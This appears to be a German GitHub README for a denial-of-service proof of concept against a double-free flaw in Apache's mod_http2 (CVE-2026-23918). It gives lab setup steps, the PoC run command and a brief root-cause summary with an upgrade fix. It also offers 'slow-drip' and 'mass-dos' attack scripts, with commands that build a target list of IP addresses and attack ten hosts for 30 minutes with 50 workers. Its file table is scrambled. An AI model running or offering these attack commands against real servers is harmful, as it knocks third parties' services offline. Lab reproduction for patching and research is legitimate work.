
PoC für die Apache-HTTP/2-Double-Free-Schwachstelle (CVE-2026-23918)
CVE-2026-23918 | Apache HTTP Server 2.4.66 | CWE-415: Double Free | CVSS 8.8 | Behoben in 2.4.67
Eine Double-Free-Schwachstelle in mod_http2 (h2_mplx.c) ermöglicht es entfernten Angreifern, über schnelle RST_STREAM-Frames einen Denial of Service (Absturz des Workers) zu verursachen, da diese eine Race Condition zwischen c1c2_stream_joined() und m_stream_cleanup() auslösen.
# 1. Start the lab
docker-compose up --build -d
# 2. Run the PoC
pip3 install h2
python3 poc.py --target 127.0.0.1 --port 8443
# 3. Watch the crash
docker logs -f apache-lab
# 4. Clean up
docker-compose down -v
Ergebnis: Der Server stürzt in ~30s–3min mit
SIGSEGVab — zuverlässiger DoS bestätigt.
| Datei | Beschreibung |
|---|---|
poc.py | Rapid-RST — Schneller Angriff: Server stürzen in 30s–3min ab |
exploits/slow-drip.py |
# Create target list
echo "192.168.1.100:8443" > targets.txt
echo "10.0.0.50:8443" >> targets.txt
# Attack 10 targets for 30 minutes
python3 exploits/mass-dos.py --targets targets.txt --duration 30 --workers 50 --intensity 7
Die Schwachstelle wird ausgelöst, wenn:
c1c2_stream_joined() und m_stream_cleanup() übernommen wirdm->spurge hinzufügenh2_purge_then_destroy() den Stream zweimal zerstört → Double Free → Segfault
Upgrade auf Apache 2.4.67 oder höher.
Vollständige Schwachstellenanalyse, Root-Cause-Analyse, Hinweise zur Ausnutzung und Anleitung zur Behebung: → rhasan.com/CVE-2026-23918
⭐ Star dieses Repository, wenn du es nützlich findest!
| Slow Drip — Nachhaltiger Angriff mit geringer Bandbreite |
exploits/mass-dos.py | Mass DoS — Nachhaltiger DoS gegen mehrere Ziele |
| Behoben |
| Apache 2.4.67 |